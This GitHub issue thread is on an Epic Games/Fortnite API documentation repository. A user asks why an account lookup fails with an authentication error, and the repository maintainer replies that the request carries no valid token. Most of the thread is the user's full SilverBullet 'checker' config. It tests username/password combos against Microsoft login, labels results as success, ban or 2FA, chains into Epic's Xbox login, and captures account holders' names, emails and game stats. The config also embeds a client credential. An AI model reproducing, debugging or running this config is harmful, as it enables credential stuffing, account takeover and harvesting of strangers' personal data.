### ISSUE TITLE
Account ID

### ISSUE THREAD

**Issue by Er1onn** [LeleDerGrasshalmi/FortniteEndpointsDocumentation#258]
## Issue Checklist

- [x] I have properly named the issue
- [x] I looked in the repo/issues/discussions, if my question was previously anwsered

---

Hello, im facing an issue with the account id API i think is not working:
Response Source:
{"errorCode":"errors.com.epicgames.common.authentication.authentication_failed","errorMessage":"Authentication failed for /api/public/account/:accountId","messageVars":["/api/public/account/:accountId"],"numericErrorCode":1032,"originatingService":"com.epicgames.account.public","intent":"prod"}
<--- Executing Block PARSE --->
Could not parse any data. The variable was not created.
<--- Executing Block PARSE --->
Could not parse any data. The variable was not created.
<--- Executing Block PARSE --->
Could not parse any data. The variable was not created.
<--- Executing Block KEY CHECK --->
===== DEBUGGER ENDED AFTER 8.714 SECOND(S) WITH STATUS: BAN =====

**Comment by LeleDerGrasshalmi** [comment]
Hi, looks like you are unauthenticated!

Check out our guide to get started with auth here
https://github.com/LeleDerGrasshalmi/FortniteEndpointsDocumentation/blob/main/EpicGames/AccountService/Authentication/README.md

**Comment by Er1onn** [comment]
> Hi, looks like you are unauthenticated!
> 
> Check out our guide to get started with auth here https://github.com/LeleDerGrasshalmi/FortniteEndpointsDocumentation/blob/main/EpicGames/AccountService/Authentication/README.md

I have this auth API on my script
https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token

**Comment by LeleDerGrasshalmi** [comment]
The given error above shows that you do not authenticate the request 🤨

**Comment by Er1onn** [comment]
> The given error above shows that you do not authenticate the request 🤨

Do u know what the issue may be?

**Comment by LeleDerGrasshalmi** [comment]
As I said, the issue is that you dont provide any authentication

**Comment by Er1onn** [comment]
> As I said, the issue is that you dont provide any authentication

is that not an authentication that i provided(https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token)? 
also  forgive me for being naive but i dont have to much knowledge about these things, if you could brovide the right api i would appreciate!

**Comment by LeleDerGrasshalmi** [comment]
the error shwos that you do NOT provide authentication. maybe show your request

**Comment by Er1onn** [comment]
> the error shwos that you do NOT provide authentication. maybe show your request

https://account-public-service-prod.ol.epicgames.com/account/api/public/account/<acc_id>

or if u have discord i could provide the whole script

**Comment by LeleDerGrasshalmi** [comment]
> https://account-public-service-prod.ol.epicgames.com/account/api/public/account/<acc_id>

this is just the url, share what headers you use

and just share it here!

**Comment by Er1onn** [comment]
Host: account-public-service-prod03.ol.epicgames.com
Accept: */*
User-Agent: UELauncher/15.20.0-30567027+++Portal+Release-Live Windows/10.0.22631.1.256.64bit
Content-Type: application/json
Authorization: bearer <eg1>
Accept-Encoding: gzip, deflate
Content-Length: 0

**Comment by LeleDerGrasshalmi** [comment]
and you are sure there is a token after the "bearer"?

**Comment by Er1onn** [comment]
the headers that i procided eraly are headers of: https://account-public-service-prod.ol.epicgames.com/account/api/public/account/<acc_id> which is after auth token which headers of auth toke are :
Host: account-public-service-prod03.ol.epicgames.com
Accept: */*
X-Epic-Correlation-ID: UE4-dbe953f64d8022a006d0ab89a5b19aab-2536DAC1465FE09928EC6CA54C2A1EBE-D27681D74ACC35BD2D855199D7C0FA2D
User-Agent: UELauncher/15.20.0-30567027+++Portal+Release-Live Windows/10.0.22631.1.256.64bit
Content-Type: application/x-www-form-urlencoded
Authorization: basic MzRhMDJjZjhmNDQxNGUyOWIxNTkyMTg3NmRhMzZmOWE6ZGFhZmJjY2M3Mzc3NDUwMzlkZmZlNTNkOTRmYzc2Y2Y=
Accept-Encoding: gzip, deflate
Content-Length: 86

**Comment by LeleDerGrasshalmi** [comment]
Can you please provide the [plain http message](https://developer.mozilla.org/en-US/docs/Web/HTTP/Messages) you are sending?

**Comment by Er1onn** [comment]
REQUEST POST "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token" 
  CONTENT "grant_type=exchange_code&exchange_code=<code>&token_type=eg1" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: account-public-service-prod03.ol.epicgames.com" 
  HEADER "Accept: */*" 
  HEADER "X-Epic-Correlation-ID: UE4-dbe953f64d8022a006d0ab89a5b19aab-2536DAC1465FE09928EC6CA54C2A1EBE-D27681D74ACC35BD2D855199D7C0FA2D" 
  HEADER "User-Agent: UELauncher/15.20.0-30567027+++Portal+Release-Live Windows/10.0.22631.1.256.64bit" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Authorization: basic MzRhMDJjZjhmNDQxNGUyOWIxNTkyMTg3NmRhMzZmOWE6ZGFhZmJjY2M3Mzc3NDUwMzlkZmZlNTNkOTRmYzc2Y2Y=" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 86" 

#access_token PARSE "<SOURCE>" JSON "access_token" -> VAR "eg1" 

#account_id PARSE "<SOURCE>" JSON "account_id" EncodeOutput=TRUE -> VAR "acc_id" 

#Username PARSE "<SOURCE>" LR "displayName\":\"" "\"" CreateEmpty=FALSE -> CAP "Username" 

REQUEST GET "https://account-public-service-prod03.ol.epicgames.com/account/api/public/account/<acc_id>" 
  
  HEADER "Host: account-public-service-prod03.ol.epicgames.com" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: UELauncher/15.20.0-30567027+++Portal+Release-Live Windows/10.0.22631.1.256.64bit" 
  HEADER "Content-Type: application/json" 
  HEADER "Authorization: bearer <eg1>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 0" 

PARSE "<SOURCE>" LR "name\":\"" "\",\"" CreateEmpty=FALSE -> CAP "name" 

PARSE "<SOURCE>" LR "email\":\"" "\",\"" CreateEmpty=FALSE -> CAP "epic_email" 

PARSE "<SOURCE>" LR "emailVerified\":" ",\"" CreateEmpty=FALSE -> CAP "emailVerified" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
  KEYCHAIN Custom "FREE" OR 
    KEY "the requested profile didnt play any match yet" 
  KEYCHAIN Failure OR 
    KEY "the requested account does not exist" 
  KEYCHAIN Retry OR 
    KEY "\"status\":500" 
  KEYCHAIN Success OR 
    KEY "the requested account's stats are not public" 
    
    
    This is a part of script

**Comment by Er1onn** [comment]
Full Script:

REQUEST POST "https://login.live.com/ppsecure/post.srf?client_id=82023151-c27d-4fb5-8551-10c10724a55e&contextid=5061D9C70A416D02&opid=881F177F0DE7F141&bk=1708969641&uaid=640b2722d13048b2baa31416fb05416b&pid=15216" 
  CONTENT "i13=0&login=<USER>&loginfmt=<USER>&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<PASS>&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT=-Dmke5Fd7AuNeG*Wrr2d85BPbFwwNVT6qqHlXf5sEhexRVxaHOrWBBauDpeABGnUvAR*kzRMVg7jbIQ*XZLExlHuJ4Pfbi*qEE7jASgMkS9Pq1bcULfe12ax*IxHMNexhunDT*LW43pmKGiAPkqc2N2XUOv2K2Q7zIWJv8Diwmt*6s1lTKvZo3bBwpTLQvM3TNA%24%24&PPSX=Passpor&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&isRecoveryAttemptPost=0&i19=69239" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 577" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Cookie: MicrosoftApplicationsTelemetryDeviceId=f2f18014-8d22-4271-9316-ea2a0631576c; mkt=en-US; MSFPC=GUID=77dc60b702b744a7a8bb4b97b4a60682&HASH=77dc&LV=202402&V=4&LU=1708090964694; MSCC=1708692431; IgnoreCAW=1; MSPRequ=id=N&lt=1708969641&co=1; uaid=640b2722d13048b2baa31416fb05416b; OParams=11O.DkGrmE76FHiT0KTjmpoK8iljUWvYOxEH5xgzn*9p7Um*KLJfQd8PzlPijUmKEXcZmndmdHX*YOAnJcHcxu2lkwh8r5IB6E8VL5WeybN56jsRc*xFlhjotdsuY6cYtppXQ*kgUQMcvC!8Wca8FuNPOtdMkhtEo2p*YX*2rlT*xnhexFIljq0AIqjfW7OZmobnmetFg1wijGggxWb4chFHiDjyI2PhpegHEZ9kfuciqI0F4a0P5kn3ZTiKHuofMUZwT8ZgaXcx5gtHxFsVuQ2iGkfcooZKYG3i0kkf1STAnz5HbWJFczQdG7rB7EfhdktzEAovn9jibNPD!LtSwlIxUG1S5efJcqRzgdyclk8yLUo2FqWGVtytbJNGygaPpIZmoQOiKe!o8CcgnlgivWNxKWbU59oyM3pY1GdCoZzItYt*tvgNLZQfHXF2NCB5ZQfmygzCreBE*zOmv47m5HFpRts$; MSPOK=$uuid-92521f09-26d2-4a97-babd-ed558e3adcf2$uuid-329f8574-38cd-4085-99dd-ec1002870c95; ai_session=zNugXTqboOsMebFaG8+M7i|1708969642935|1708969703644; wlidperf=FR=L&ST=1708969710576" 

KEYCHECK 
  KEYCHAIN Failure AND 
    KEY "Your account or password is incorrect." 
    KEY "That Microsoft account doesn\\'t exist. Enter a different account" 
    KEY "Sign in to your Microsoft account" 
  KEYCHAIN Ban OR 
    KEY ",AC:null,urlFedConvertRename" 
  KEYCHAIN Failure OR 
    KEY "timed out" 
  KEYCHAIN Success OR 
    KEY "<COOKIES>" Contains "ANON" 
    KEY "<COOKIES>" Contains "WLSSC" 
    KEY "<ADDRESS>" Contains "https://login.live.com/oauth20_desktop.srf?" 
    KEY "sSigninName" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "account.live.com/recover?mkt" 
    KEY "recover?mkt" 
    KEY "account.live.com/identity/confirm?mkt" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Email/Confirm?mkt" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/cancel?mkt=" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/Abuse?mkt=" 

KEYCHECK 
  KEYCHAIN Failure AND 
    KEY "Sign in to your Microsoft account" 
  KEYCHAIN Ban OR 
    KEY ",AC:null,urlFedConvertRename" 
  KEYCHAIN Success OR 
    KEY "<COOKIES>" Contains "ANON" 
    KEY "<COOKIES>" Contains "WLSSC" 
    KEY "<ADDRESS>" Contains "https://login.live.com/oauth20_desktop.srf?" 
    KEY "sSigninName" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "account.live.com/recover?mkt" 
    KEY "recover?mkt" 
    KEY "account.live.com/identity/confirm?mkt" 

PARSE "<SOURCE>" LR "urlPost:'" "'" -> VAR "URL" 

PARSE "<URL>" LR "&route=" "" -> VAR "RR" 

PARSE "<COOKIES(OParams)>" LR "" "" -> VAR "OParams" 

PARSE "<COOKIES(__Host-MSAAUTH)>" LR "" "" -> VAR "MSA" 

REQUEST GET "https://login.live.com/oauth20_authorize.srf?client_id=82023151-c27d-4fb5-8551-10c10724a55e&redirect_uri=https%3A%2F%2Faccounts.epicgames.com%2FOAuthAuthorized&state=eyJpZCI6ImUyYjZjMzY1NmMxMDQ1ZjJiNGM2NTE4NDAwNzk4YWJjIn0%3D&scope=xboxlive.signin&service_entity=undefined&force_verify=true&response_type=code&display=popup" 
  
  HEADER "Host: login.live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://www.epicgames.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<ADDRESS(Address)>" LR "?code=" "&state=" -> VAR "mr" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<mr>" Contains "M." 
  KEYCHAIN Custom "NOTLINKED" OR 
    KEY "<mr>" DoesNotContain "M." 

REQUEST GET "https://www.unrealengine.com/id/api/reputation" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<COOKIES(EPIC_SESSION_REPUTATION)>" JSON "" -> VAR "SID" 

PARSE "<COOKIES(EPIC_SESSION_AP)>" JSON "" -> VAR "AP" 

PARSE "<COOKIES(XSRF-TOKEN)>" JSON "" -> VAR "XSRF" 

PARSE "<COOKIES(EPIC_DEVICE)>" JSON "" -> VAR "EPIC_DEVICE" 

REQUEST POST "https://www.unrealengine.com/id/api/external/xbl/login" 
  CONTENT "{\"code\":\"<mr>\"}" 
  CONTENTTYPE "application/json" 
  COOKIE "Cookie: EPIC_SESSION_REPUTATION=<SID>; EPIC_SESSION_AP=<AP>; EPIC_DEVICE=<EPIC_DEVICE>" 
  HEADER "POST: /id/api/external/xbl/login HTTP/1.1" 
  HEADER "Host: www.unrealengine.com" 
  HEADER "Connection: keep-alive" 
  HEADER "X-Epic-Event-Category: null" 
  HEADER "X-XSRF-TOKEN: <XSRF>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 OPR/74.0.3911.107 (Edition utorrent)" 
  HEADER "X-Epic-Event-Action: null" 
  HEADER "Content-Type: application/json;charset=UTF-8" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "X-Epic-Strategy-Flags: guardianEmailVerifyEnabled=false;guardianKwsFlowEnabled=false;minorPreRegisterEnabled=false" 
  HEADER "Origin: https://www.unrealengine.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.unrealengine.com/id/login/xbl?prompt=&extLoginState=eyJ0cmFja2luZ1V1aWQiOiJmN2MxODNkMzczYmQ0NzMxYTKAPqjZkTam1yBDDgT46D1nqFiWD2wv9Ay0cnVlLCJpcCI6IjE5Ny4yNi4xMzguMjE2IiwiaWQiOiIwMjEwYTIyNTcyMjU0ZDYzOTKAPqjZkTam1yBDDgT46D1nqFiWD2wv9AyNLlIzX0JBWS5mYzRjZGZjNi1iMTKAPqjZkTam1yBDDgT46D1nqFiWD2wv9AyifQ%253D%253D" 
  HEADER "Accept-Language: en-US,us;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 56" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "2FA" OR 
    KEY "message\":\"Two-Factor authentication" 
  KEYCHAIN Retry OR 
    KEY "code is required" 
  KEYCHAIN Custom "Not Linked" OR 
    KEY "DATE_OF_BIRTH" 
    KEY "message\":\"No account was found to log you in" 
  KEYCHAIN Custom "Account Epic Need Update" OR 
    KEY "Please update your account with display name and email specified." 
  KEYCHAIN Success OR 

REQUEST GET "https://www.unrealengine.com/id/api/csrf" ReadResponseSource=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) EpicGamesLauncher/10.19.9-14892359+++Portal+Release-Live UnrealEngine/4.23.0-14892359+++Portal+Release-Live Chrome/59.0.3071.15 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "https://www.unrealengine.com/id/api/redirect?provider=xbl" 
  
  COOKIE "Cookie: EPIC_SESSION_REPUTATION=<SID>; EPIC_SESSION_AP=<AP>" 
  HEADER "Host: www.unrealengine.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) EpicGamesLauncher/15.20.0-30567027+++Portal+Release-Live UnrealEngine/4.27.0-30567027+++Portal+Release-Live Chrome/90.0.4430.212 Safari/537.36" 
  HEADER "X-Epic-Access-Key: undefined" 
  HEADER "X-Epic-Client-ID: undefined" 
  HEADER "X-Epic-Display-Mode: web" 
  HEADER "X-Epic-Duration: 2191" 
  HEADER "X-Epic-Event-Action: external" 
  HEADER "X-Epic-Event-Category: login" 
  HEADER "X-Epic-Flow: login" 
  HEADER "X-Epic-IdP-Provider: xbl" 
  HEADER "X-Epic-Platform: WEB" 
  HEADER "X-Epic-Strategy-Flags: isolatedTestFlagEnabled=false" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "X-XSRF-TOKEN: 16wXLVpaPudWkH4gD2cEmNZNNLBBuCAuAG" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"90\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.unrealengine.com/id/login/xbl?lang=en&prompt=&extLoginState=eyJ0cmFja2luZ1V1aWQiOiIwOTE1YWY1N2JmODk0NTKAPqjZkTam1yBDDgT46D1nqFiWD2wv9AyuUmVxdWVzdElkIjoiMTKAPqjZkTam1yBDDgT46D1nqFiWD2wv9Ay1MjhhOTKAPqjZkTam1yBDDgT46D1nqFiWD2wv9AyuMjQ4LjEwOC45MCIsIm9yaWdpbiI6ImVwaWNnYW1lcyIsImlkIjoiYmUwYTKAPqjZkTam1yBDDgT46D1nqFiWD2wv9AylODgiLCJjb2RlIjoiTS5DMTA3X0JMMi4yLjBjOWQyNTBmLTZmOTItZWMzZS03NGI2LWU1YmVhNWJlNTVlYSJ9" 
  HEADER "Accept-Language: en" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<SOURCE>" LR "exchangeCode\":\"" "\",\"" -> VAR "code" 

REQUEST POST "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token" 
  CONTENT "grant_type=exchange_code&exchange_code=<code>&token_type=eg1" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: account-public-service-prod03.ol.epicgames.com" 
  HEADER "Accept: */*" 
  HEADER "X-Epic-Correlation-ID: UE4-dbe953f64d8022a006d0ab89a5b19aab-2536DAC1465FE09928EC6CA54C2A1EBE-D27681D74ACC35BD2D855199D7C0FA2D" 
  HEADER "User-Agent: UELauncher/15.20.0-30567027+++Portal+Release-Live Windows/10.0.22631.1.256.64bit" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Authorization: basic MzRhMDJjZjhmNDQxNGUyOWIxNTkyMTg3NmRhMzZmOWE6ZGFhZmJjY2M3Mzc3NDUwMzlkZmZlNTNkOTRmYzc2Y2Y=" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 86" 

#access_token PARSE "<SOURCE>" JSON "access_token" -> VAR "eg1" 

#account_id PARSE "<SOURCE>" JSON "account_id" EncodeOutput=TRUE -> VAR "acc_id" 

#Username PARSE "<SOURCE>" LR "displayName\":\"" "\"" CreateEmpty=FALSE -> CAP "Username" 

REQUEST GET "https://account-public-service-prod03.ol.epicgames.com/account/api/public/account/<acc_id>" 
  
  HEADER "Host: account-public-service-prod03.ol.epicgames.com" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: UELauncher/15.20.0-30567027+++Portal+Release-Live Windows/10.0.22631.1.256.64bit" 
  HEADER "Content-Type: application/json" 
  HEADER "Authorization: bearer <eg1>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 0" 

PARSE "<SOURCE>" LR "name\":\"" "\",\"" CreateEmpty=FALSE -> CAP "name" 

PARSE "<SOURCE>" LR "email\":\"" "\",\"" CreateEmpty=FALSE -> CAP "epic_email" 

PARSE "<SOURCE>" LR "emailVerified\":" ",\"" CreateEmpty=FALSE -> CAP "emailVerified" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
  KEYCHAIN Custom "FREE" OR 
    KEY "the requested profile didnt play any match yet" 
  KEYCHAIN Failure OR 
    KEY "the requested account does not exist" 
  KEYCHAIN Retry OR 
    KEY "\"status\":500" 
  KEYCHAIN Success OR 
    KEY "the requested account's stats are not public" 

#id PARSE "<SOURCE>" LR "{\"id\":\"" "\",\"" -> VAR "ID" 

PARSE "<SOURCE>" LR "\"battlePass\":{\"level\":" ",\"" CreateEmpty=FALSE -> CAP "Battle Pass Level" 

PARSE "<SOURCE>" LR "\"wins\":" ",\"" CreateEmpty=FALSE -> CAP "Total Wins" 

PARSE "<SOURCE>" LR ",\"kills\":" ",\"" CreateEmpty=FALSE -> CAP "Total Kills" 

PARSE "<SOURCE>" LR "\"matches\":" ",\"" CreateEmpty=FALSE -> CAP "Total Matches" 

PARSE "<SOURCE>" LR "\"lastModified\":\"" "T" CreateEmpty=FALSE -> CAP "Last Login"

**Comment by LeleDerGrasshalmi** [comment]
hi again, thanks for the script, whatever "weird" language that is.

However, the error you originally sent means that you do not specify a token, or in a invalid way, like
![image](https://github.com/LeleDerGrasshalmi/FortniteEndpointsDocumentation/assets/62852525/3f5f5630-3309-4921-9db2-f3061e5da808)

**Comment by Er1onn** [comment]
That is a script for SilverBullet checker tool!

Do u know any fix?

**Comment by LeleDerGrasshalmi** [comment]
As i said, you supply the token in a invalid way, or not at all. Thats what the error means.
